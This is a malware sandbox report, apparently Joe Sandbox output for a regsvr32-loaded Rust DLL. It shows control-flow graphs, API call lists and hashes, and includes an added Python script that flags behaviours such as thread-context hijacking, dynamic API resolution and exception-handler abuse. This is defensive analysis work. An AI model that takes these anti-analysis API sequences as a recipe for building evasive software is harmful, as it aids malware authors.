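`reachable_apis(blocks, edges, 2010)` on the excerpt yields CloseHandle, WaitForSingleObject, GetLastError in that order; on the full line the same walk also reaches GetExitCodeProcess and the CloseHandle pairs at the end, which is the wait-for-child-and-close-handles shape that goes with the `Result::unwrap()` panic string attached to this function.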
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle$ErrorLastObjectSingleWait
                                                                              • String ID: called `Result::unwrap()` on an `Err` value
                                                                              • API String ID: 1454876536-2333694755
                                                                              • Opcode ID: 660baef9c8bf454d89af356a35f9762fb17fecd442998839c101f79af35d2176
                                                                              • Instruction ID: 2e4d6c4817b15af8830d5f1de1e795a5b4c0d8c7cf03ad6cdc4c69cbee933845
                                                                              • Opcode Fuzzy Hash: 660baef9c8bf454d89af356a35f9762fb17fecd442998839c101f79af35d2176
                                                                              • Instruction Fuzzy Hash: C3C16D32B08A4289EB109F61E8A13FD2760BB46798F144439EF4D96B9DDF3CE585E350

                                                                              Control-flow Graph

                                                                              control_flow_graph 2207 7ffd3493f930-7ffd3493f968 call 7ffd3493fbd0 2210 7ffd3493f977-7ffd3493f9aa call 7ffd3493fbd0 2207->2210 2211 7ffd3493f96a-7ffd3493f972 CloseHandle 2207->2211 2215 7ffd3493f9b0-7ffd3493f9e8 2210->2215 2216 7ffd3493fb71-7ffd3493fb75 call 7ffd348fdac0 2210->2216 2212 7ffd3493fb7a-7ffd3493fb8c 2211->2212 2217 7ffd3493f9f0-7ffd3493fa09 call 7ffd34992d24 2215->2217 2216->2212 2221 7ffd3493fa50-7ffd3493fa57 2217->2221 2222 7ffd3493fa0b-7ffd3493fa0d 2217->2222 2225 7ffd3493fa5d-7ffd3493fa60 2221->2225 2226 7ffd3493fb25-7ffd3493fb2b call 7ffd3493fcb0 2221->2226 2223 7ffd3493fa13-7ffd3493fa1a 2222->2223 2224 7ffd3493fb58-7ffd3493fb5d GetLastError 2222->2224 2228 7ffd3493fa20-7ffd3493fa23 2223->2228 2229 7ffd3493faae-7ffd3493fab4 call 7ffd3493fcb0 2223->2229 2230 7ffd3493fb60-7ffd3493fb64 2224->2230 2231 7ffd3493fa62-7ffd3493fa66 2225->2231 2232 7ffd3493fa6b-7ffd3493fa8a GetOverlappedResult 2225->2232 2233 7ffd3493fb30-7ffd3493fb34 2226->2233 2235 7ffd3493fa91 2228->2235 2236 7ffd3493fa25-7ffd3493fa44 GetOverlappedResult 2228->2236 2244 7ffd3493fab9-7ffd3493fabd 2229->2244 2237 7ffd3493fb68-7ffd3493fb6c call 7ffd348fdac0 2230->2237 2238 7ffd3493fb10-7ffd3493fb23 2231->2238 2239 7ffd3493fa8c-7ffd3493fa8f 2232->2239 2240 7ffd3493fae9-7ffd3493faf1 GetLastError 2232->2240 2242 7ffd3493fb42-7ffd3493fb46 2233->2242 2243 7ffd3493fb36-7ffd3493fb3a 2233->2243 2241 7ffd3493fa95-7ffd3493faa8 2235->2241 2245 7ffd3493facf-7ffd3493fad7 GetLastError 2236->2245 2246 7ffd3493fa4a-7ffd3493fa4d 2236->2246 2237->2216 2238->2226 2250 7ffd3493fb4b-7ffd3493fb56 call 7ffd3493fdc0 2238->2250 2239->2238 2247 7ffd3493faf3-7ffd3493faff 2240->2247 2248 7ffd3493fb07-7ffd3493fb09 2240->2248 2241->2229 2251 7ffd3493fb48 2241->2251 2242->2237 2243->2217 2252 7ffd3493fb40 2243->2252 2244->2242 2253 7ffd3493fac3-7ffd3493fac7 2244->2253 2254 7ffd3493fb03-7ffd3493fb05 2245->2254 2255 7ffd3493fad9-7ffd3493fae5 
2245->2255 2246->2241 2247->2238 2257 7ffd3493fb01 2247->2257 2248->2238 2250->2237 2251->2250 2252->2250 2253->2217 2258 7ffd3493facd 2253->2258 2254->2241 2255->2241 2259 7ffd3493fae7 2255->2259 2257->2230 2258->2251 2259->2230
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateEventHandleOverlappedResult
                                                                              • String ID:
                                                                              • API String ID: 3756958029-0
                                                                              • Opcode ID: 84a7fc5001b71218857a51a8f00ab7653fb51d5c37684a85e2f4fab1a857e566
                                                                              • Instruction ID: 09629becd0e96d21367f7999c8281521745ef32a758ae7708f8b54a391080136
                                                                              • Opcode Fuzzy Hash: 84a7fc5001b71218857a51a8f00ab7653fb51d5c37684a85e2f4fab1a857e566
                                                                              • Instruction Fuzzy Hash: 4C619162F08A4689FB508A6584B13BC2BB0AB17798F144439DF0DD7B9DDF2CE585A360

                                                                              Control-flow Graph

                                                                              control_flow_graph 2261 7ffd34939060-7ffd34939097 call 7ffd349471c0 2264 7ffd349390a3-7ffd349390dd call 7ffd349497b0 2261->2264 2265 7ffd34939099-7ffd3493909e 2261->2265 2269 7ffd349390df-7ffd349390e2 2264->2269 2270 7ffd349390e7-7ffd349390f1 2264->2270 2266 7ffd3493927b-7ffd3493928a 2265->2266 2269->2266 2271 7ffd349390f3-7ffd349390f5 2270->2271 2272 7ffd349390f9-7ffd349390fb 2270->2272 2273 7ffd349390fd-7ffd34939101 2271->2273 2275 7ffd349390f7 2271->2275 2272->2273 2274 7ffd34939158-7ffd3493915c 2272->2274 2276 7ffd3493910d-7ffd34939116 2273->2276 2277 7ffd34939103-7ffd34939107 2273->2277 2278 7ffd3493924d-7ffd3493925a 2274->2278 2279 7ffd34939162-7ffd34939166 2274->2279 2275->2276 2281 7ffd3493912d-7ffd34939130 2276->2281 2282 7ffd34939118-7ffd34939121 2276->2282 2277->2276 2277->2278 2278->2266 2280 7ffd3493925c-7ffd34939276 call 7ffd348efe90 2278->2280 2279->2278 2283 7ffd3493916c-7ffd34939170 2279->2283 2280->2266 2286 7ffd34939132-7ffd3493913b 2281->2286 2287 7ffd34939177-7ffd34939187 2281->2287 2285 7ffd34939123-7ffd34939126 2282->2285 2282->2286 2283->2276 2288 7ffd34939172 2283->2288 2290 7ffd3493913d-7ffd34939141 2285->2290 2291 7ffd34939128-7ffd3493912b 2285->2291 2286->2290 2286->2291 2287->2291 2292 7ffd34939189 2287->2292 2288->2278 2294 7ffd34939143-7ffd34939156 2290->2294 2295 7ffd3493918b-7ffd3493918d 2290->2295 2293 7ffd349391a7-7ffd349391df CreateFileW 2291->2293 2292->2290 2298 7ffd349391e5-7ffd349391ec 2293->2298 2299 7ffd3493928b-7ffd349392a3 GetLastError 2293->2299 2294->2293 2296 7ffd3493918f-7ffd34939196 2295->2296 2297 7ffd3493919a-7ffd3493919c 2295->2297 2300 7ffd349391a2 2296->2300 2301 7ffd34939198 2296->2301 2297->2278 2297->2300 2304 7ffd349391ee-7ffd349391f2 2298->2304 2305 7ffd34939227-7ffd3493922c 2298->2305 2302 7ffd3493922e-7ffd34939245 call 7ffd348efe90 2299->2302 2303 7ffd349392a5 2299->2303 2300->2293 2301->2293 2306 7ffd34939248-7ffd3493924b 
2302->2306 2303->2306 2304->2305 2307 7ffd349391f4-7ffd349391fe GetLastError 2304->2307 2305->2302 2305->2306 2306->2266 2307->2305 2309 7ffd34939200-7ffd34939221 SetFileInformationByHandle 2307->2309 2309->2305 2311 7ffd349392a7-7ffd349392c2 GetLastError call 7ffd349929dc 2309->2311 2314 7ffd349392c4-7ffd349392d3 call 7ffd348efe90 2311->2314 2315 7ffd349392d8-7ffd349392e0 2311->2315 2314->2315 2315->2266
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1452528299-0
                                                                              • Opcode ID: e64884f427bebdb6745d6532d253e7e2c87e6a1ed95c8e7f63ce1c3bb79c8093
                                                                              • Instruction ID: a38cc0b7e886a8c085328dfd3a2f497690e8e3bb2f29b2d70d8a6c1808818c09
                                                                              • Opcode Fuzzy Hash: e64884f427bebdb6745d6532d253e7e2c87e6a1ed95c8e7f63ce1c3bb79c8093
                                                                              • Instruction Fuzzy Hash: 96611592F0C65245FB65866184B43BA27E86B07BD8F044139DF4D97BCDCE3DE845AB20
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: 6d9780c7c443a032da55d84583ee6c2b60b91ec6d5bbca3c50946c1976a76f11
                                                                              • Instruction ID: 421ef34fdad95b030717c913eb34bc2b47156bca157b72f4556fa574d9108474
                                                                              • Opcode Fuzzy Hash: 6d9780c7c443a032da55d84583ee6c2b60b91ec6d5bbca3c50946c1976a76f11
                                                                              • Instruction Fuzzy Hash: D0025932B0CAC690EA759B15F4907EBA360FB86B84F444126DF8C87A89DF7DD185DB40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: c746f4be362a77f9fc67f5068aa556fc09bef7a2b3fffd3054f3dd5c4daee66a
                                                                              • Instruction ID: a0ccf34dafec2ed17391d1e95c7926c5b81bc8b7aaa70af00f5b137368b2274d
                                                                              • Opcode Fuzzy Hash: c746f4be362a77f9fc67f5068aa556fc09bef7a2b3fffd3054f3dd5c4daee66a
                                                                              • Instruction Fuzzy Hash: BF025932B0CAC690EA759B15F4907EBA360FB86B84F444126DB8C87A89DF7DD185DB40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: 7a72410df9da9a7089c9d572e05d1a4109c1312c41cbc173bf6b8ab67d2b254e
                                                                              • Instruction ID: d2874a0f5f2db1fe4fc2746e025f6bfd9c6b2953e5db7e3e77d4bcc8fe2d9d91
                                                                              • Opcode Fuzzy Hash: 7a72410df9da9a7089c9d572e05d1a4109c1312c41cbc173bf6b8ab67d2b254e
                                                                              • Instruction Fuzzy Hash: 76026B3270CAC690EA759B15F4907EBA360FB86B84F444126DF8C87A89DF7DD185DB40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: 1a22cdd41c4435c0922e20372dc6ebb06f449dd7f04de9c3685a4b7a55fe74f8
                                                                              • Instruction ID: 86b711a56954de47a1b2250963d1b28a39d2f189b8891af6204f27304c20f241
                                                                              • Opcode Fuzzy Hash: 1a22cdd41c4435c0922e20372dc6ebb06f449dd7f04de9c3685a4b7a55fe74f8
                                                                              • Instruction Fuzzy Hash: B3025932B0CAC690EA759B15F4907EBA360FB86B84F444126DF8C87A89DF7DD185DB40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: ee874683aef2c1240f85a84e88de2ebd7c8b9b8b5d14169c8f2e6763fdb8a4cc
                                                                              • Instruction ID: 94923a4043559effd41c17893907330a43ae510be0a763ba5a9fc0645c5564bb
                                                                              • Opcode Fuzzy Hash: ee874683aef2c1240f85a84e88de2ebd7c8b9b8b5d14169c8f2e6763fdb8a4cc
                                                                              • Instruction Fuzzy Hash: 5D026A32B0CAC690EA759B15F4907EBA360FB86B84F444126DF8C87A89DF7DD185DB40

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source / Joe Sandbox IDA Plugin: same dump (00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, offset 00007FFD348E0000, based on PE) and snapshot (hcaresult_9_2_7ffd348e0000_regsvr32.jbxd) as above.
                                                                              Similarity
                                                                              • API ID: CloseHandle$CreateErrorEventLast
                                                                              • String ID:
                                                                              • API String ID: 3743700123-0
                                                                              • Opcode ID: 3523ead0fb1eeef65b5e01312bb2815987b47a6b11994a640fbe8d21b747275b
                                                                              • Instruction ID: e52d8beacd9eb3b691dc698b619ef84cf88cfbdc47947d13d783e7b995ba65cd
                                                                              • Opcode Fuzzy Hash: 3523ead0fb1eeef65b5e01312bb2815987b47a6b11994a640fbe8d21b747275b
                                                                              • Instruction Fuzzy Hash: C211D622B0474156F7599B12A6A03792690EB8AB90F184138DF8C47BC6EF3CA4E2A310

                                                                              Control-flow Graph

                                                                              [Control-flow graph of the function at 7ffd348f67b0 (rendered graph; executed and not-executed blocks are colour-coded in the image). API calls on the graph: TlsGetValue, TlsSetValue.]
                                                                              APIs
                                                                              Memory Dump Source / Joe Sandbox IDA Plugin: same dump (00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, offset 00007FFD348E0000, based on PE) and snapshot (hcaresult_9_2_7ffd348e0000_regsvr32.jbxd) as above.
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID:
                                                                              • API String ID: 3702945584-0
                                                                              • Opcode ID: b8fea45ead18cdd206ebf83bef4c4e570bd5c96a6b59aeef6ae735ea17c2f39c
                                                                              • Instruction ID: efb3dec8e4b4ffed2b7efc011dbb0c9c1576d5517f589e5e374e0e0844330df0
                                                                              • Opcode Fuzzy Hash: b8fea45ead18cdd206ebf83bef4c4e570bd5c96a6b59aeef6ae735ea17c2f39c
                                                                              • Instruction Fuzzy Hash: 9DA1D422B18AC181FA558B18E0913F9A3A0FF86784F149234EB8C577A5EF3DE5D29340

                                                                              Control-flow Graph

                                                                              [Control-flow graph of the function at 7ffd348fdac0: a single block 7ffd348fdac0-7ffd348fdafb that calls 7ffd3493fe90 and then CloseHandle twice.]
                                                                              APIs
                                                                                • Part of subcall function 00007FFD3493FE90: GetOverlappedResult.KERNEL32(00000000,?,00000000,?,00007FFD348FDAD4,?,00000000,?,00007FFD3493FB7A), ref: 00007FFD3493FED1
                                                                              • CloseHandle.KERNEL32(?,00000000,?,00007FFD3493FB7A), ref: 00007FFD348FDAD8
                                                                              • CloseHandle.KERNEL32(?,00000000,?,00007FFD3493FB7A), ref: 00007FFD348FDAE1
                                                                              Memory Dump Source / Joe Sandbox IDA Plugin: same dump (00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, offset 00007FFD348E0000, based on PE) and snapshot (hcaresult_9_2_7ffd348e0000_regsvr32.jbxd) as above.
                                                                              Similarity
                                                                              • API ID: CloseHandle$OverlappedResult
                                                                              • String ID:
                                                                              • API String ID: 953004297-0
                                                                              • Opcode ID: 664788fec045c97cfa4a43f446a0bf17c13a88a4f8b435e264a1485e7add3fa3
                                                                              • Instruction ID: 5c6db2ab9955b2291913cd632decce6bdc12fb139acf9e4e2a1e235696c09f83
                                                                              • Opcode Fuzzy Hash: 664788fec045c97cfa4a43f446a0bf17c13a88a4f8b435e264a1485e7add3fa3
                                                                              • Instruction Fuzzy Hash: F7E08603B0460587F630A662F4A11BA6320AB8A790F044035EF8D8BB968D2CE4C2A720

                                                                              Control-flow Graph

                                                                              [Control-flow graph of the function at 7ffd348ea040 (rendered graph; executed and not-executed blocks are colour-coded in the image). API calls on the graph, in order of first appearance: memset, GetModuleHandleA, LoadLibraryA, GetProcAddress, AddVectoredExceptionHandler, NtQueryInformationProcess, NtQuerySystemInformation, NtOpenThread, NtGetContextThread, NtSetContextThread, NtClose. The NtOpenThread / NtGetContextThread / NtSetContextThread / NtClose sequence is the thread-context manipulation behind the "Sets debug register" signature in the overview.]
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source / Joe Sandbox IDA Plugin: same dump (00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, offset 00007FFD348E0000, based on PE) and snapshot (hcaresult_9_2_7ffd348e0000_regsvr32.jbxd) as above.
                                                                              Similarity
                                                                              • API ID: HandleModule$AddressContextInformationProcQueryThread$ExceptionHandlerLibraryLoadProcessSystemVectoredmemset
                                                                              • String ID: called `Result::unwrap()` on an `Err` value/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\collections\btree\navigate.rs
                                                                              • API String ID: 2177257871-362855569
                                                                              • Opcode ID: 02edd65b9ca3a91810b8c05ee153fc30b39838edde7d003dfe31fc50903a214a
                                                                              • Instruction ID: 82c2aaf76fa6323d29e32a39401375ca7cd0c631679371d8d79ac7c9b48b4c6c
                                                                              • Opcode Fuzzy Hash: 02edd65b9ca3a91810b8c05ee153fc30b39838edde7d003dfe31fc50903a214a
                                                                              • Instruction Fuzzy Hash: A3426332B0C78281F6659B11A4A03BB67A0FF86B84F484135DF8D87B99DF7DE485A710
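The function records above are only useful for triage once the per-function API lists are pulled out and matched against behaviour patterns. The following script is an added example written for this page; it is not Joe Sandbox code and not part of the analysed sample. It parses the record format shown here (the `control_flow_graph <id> <entry>-<end> ...` line that opens a record and the `• Api.MODULE(args), ref: ADDR` lines under `APIs`) and flags the API combinations that correspond to signatures in the overview. The rule sets are this example's own choice. The first sample record is copied from the report (function 7ffd348fdac0); the second is constructed from the node labels of the 7ffd348ea040 graph, with assumed module names (Nt* in NTDLL, the rest in KERNEL32), `?` arguments and the containing basic-block start used as the `ref` address.

```python
"""Triage helper for the per-function API listings in a Joe Sandbox
execution-graph report. Added example: not Joe Sandbox code and not
part of the analysed sample. Rule sets are the example's own."""
import re

# Opening line of a function record; the entry address comes first.
CFG_LINE = re.compile(
    r"^\s*control_flow_graph\s+\d+\s+(?P<entry>[0-9A-Fa-f]+)-[0-9A-Fa-f]+"
)

# '• CloseHandle.KERNEL32(?,00000000), ref: 00007FFD348FDAD8'
# '• Part of subcall function 00007FFD3493FE90: GetOverlappedResult.KERNEL32(...), ref: ...'
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)\((?P<args>[^)]*)\)"
    r",\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# A function is flagged when it (directly or through a listed callee)
# reaches every API in the set. Names mirror the report's signatures.
RULES = {
    "thread_context_hijack": {"NtOpenThread", "NtGetContextThread", "NtSetContextThread"},
    "dynamic_api_resolution": {"LoadLibraryA", "GetProcAddress"},
    "vectored_exception_handler": {"AddVectoredExceptionHandler"},
    "process_introspection": {"NtQueryInformationProcess", "NtQuerySystemInformation"},
}


def parse_functions(text):
    """Return {entry_address: [call dicts]} for every function record in text."""
    functions = {}
    entry = None
    for line in text.splitlines():
        m = CFG_LINE.match(line)
        if m:
            entry = int(m.group("entry"), 16)
            functions.setdefault(entry, [])   # keep records that list no APIs
            continue
        m = API_LINE.match(line)
        if m and entry is not None:
            functions[entry].append({
                "api": m.group("api"),
                "module": m.group("mod").upper(),
                "args": [a.strip() for a in m.group("args").split(",") if a.strip()],
                "ref": int(m.group("ref"), 16),
                # address of the callee that makes the call, or None if direct
                "via": int(m.group("sub"), 16) if m.group("sub") else None,
            })
    return functions


def classify(functions):
    """Map entry address -> sorted names of rules whose API set is fully present."""
    verdicts = {}
    for entry, calls in functions.items():
        seen = {c["api"] for c in calls}
        verdicts[entry] = sorted(name for name, apis in RULES.items() if apis <= seen)
    return verdicts


# Constructed sample: record 1 is copied from the report; record 2 is rebuilt
# from the report's CFG node labels for 7ffd348ea040 with assumed modules,
# '?' arguments and basic-block start addresses as 'ref'.
SAMPLE = """\
control_flow_graph 4547 7ffd348fdac0-7ffd348fdafb call 7ffd3493fe90 CloseHandle * 2
APIs
  • Part of subcall function 00007FFD3493FE90: GetOverlappedResult.KERNEL32(00000000,?,00000000,?,00007FFD348FDAD4,?,00000000,?,00007FFD3493FB7A), ref: 00007FFD3493FED1
• CloseHandle.KERNEL32(?,00000000,?,00007FFD3493FB7A), ref: 00007FFD348FDAD8
• CloseHandle.KERNEL32(?,00000000,?,00007FFD3493FB7A), ref: 00007FFD348FDAE1
control_flow_graph 5085 7ffd348ea040-7ffd348ea085 memset
APIs
• GetModuleHandleA.KERNEL32(?), ref: 00007FFD348EA10D
• LoadLibraryA.KERNEL32(?), ref: 00007FFD348EA139
• GetProcAddress.KERNEL32(?,?), ref: 00007FFD348EA21C
• AddVectoredExceptionHandler.KERNEL32(?,?), ref: 00007FFD348EA491
• NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00007FFD348EA491
• NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 00007FFD348EA509
• NtOpenThread.NTDLL(?,?,?,?), ref: 00007FFD348EA63A
• NtGetContextThread.NTDLL(?,?), ref: 00007FFD348EA6FC
• NtSetContextThread.NTDLL(?,?), ref: 00007FFD348EA788
• NtClose.NTDLL(?), ref: 00007FFD348EA79B
"""

if __name__ == "__main__":
    for entry, flags in classify(parse_functions(SAMPLE)).items():
        print(f"{entry:016x}: {', '.join(flags) or 'no rule matched'}")
```

Run against the full report text, the script gives one line per function with the matched behaviour rules, which is enough to jump straight to the functions worth opening in the disassembler (here the 7ffd348ea040 record, which matches all four rules, against the housekeeping 7ffd348fdac0 record, which matches none).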

                                                                              Control-flow Graph

                                                                              [Control-flow graph of the function at 7ffd348e7f00 (rendered graph; executed and not-executed blocks are colour-coded in the image). API calls on the graph: GetModuleHandleA, GetProcAddress and LoadLibraryA in a repeated resolve-or-fail pattern, then CreateEventW and WaitForSingleObject.]
                                                                              APIs
